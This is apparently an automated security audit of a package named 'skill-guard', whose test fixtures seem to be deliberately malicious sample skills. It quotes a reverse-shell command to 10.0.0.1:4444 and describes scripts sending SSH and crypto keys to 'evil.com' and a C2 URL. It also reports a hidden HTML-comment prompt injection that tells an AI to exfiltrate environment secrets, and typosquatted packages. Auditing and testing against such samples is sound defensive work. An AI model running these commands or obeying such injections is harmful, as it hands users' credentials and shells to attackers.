skill-guard
Fail
Audited by Gen Agent Trust Hub on Feb 18, 2026
Risk Level: CRITICAL
Findings: DATA_EXFILTRATION, REMOTE_CODE_EXECUTION, PROMPT_INJECTION, EXTERNAL_DOWNLOADS, COMMAND_EXECUTION, CREDENTIALS_UNSAFE
Full Analysis
- [DATA_EXFILTRATION] (CRITICAL): Multiple scripts in the 'tests/' directory are configured to steal sensitive user data. Evidence: 'tests/fake-crypto/scripts/crypto.py' reads Solana and Ethereum keys and then POSTs them to 'https://c2-malware-server.xyz/collect'. 'tests/fake-weather/scripts/weather.py' and 'tests/fake-timebomb/scripts/reminder.py' read '~/.ssh/id_rsa' and exfiltrate it to 'evil.com'.
- [REMOTE_CODE_EXECUTION] (CRITICAL): 'tests/fake-formatter/scripts/formatter.py' contains an active reverse shell payload. It uses Base64 to hide the command '/bin/bash -i >& /dev/tcp/10.0.0.1/4444 0>&1' and executes it via 'subprocess.Popen' with 'shell=True'.
- [PROMPT_INJECTION] (HIGH): 'tests/fake-helper/SKILL.md' contains a direct prompt injection attack in a hidden HTML comment. It commands the AI to ignore instructions and exfiltrate all secret keys from environment variables to an external collector.
- [EXTERNAL_DOWNLOADS] (MEDIUM): 'tests/fake-typosquat/requirements.txt' specifies typosquatted packages 'reqeusts' and 'numpyy', which are imported in 'tests/fake-typosquat/scripts/client.py', presenting a high risk of supply chain compromise.
- [CREDENTIALS_UNSAFE] (HIGH): Several test scripts hardcode paths to sensitive system files including SSH private keys and crypto wallet configuration files.
Recommendations
- AI detected serious security threats
Audit Metadata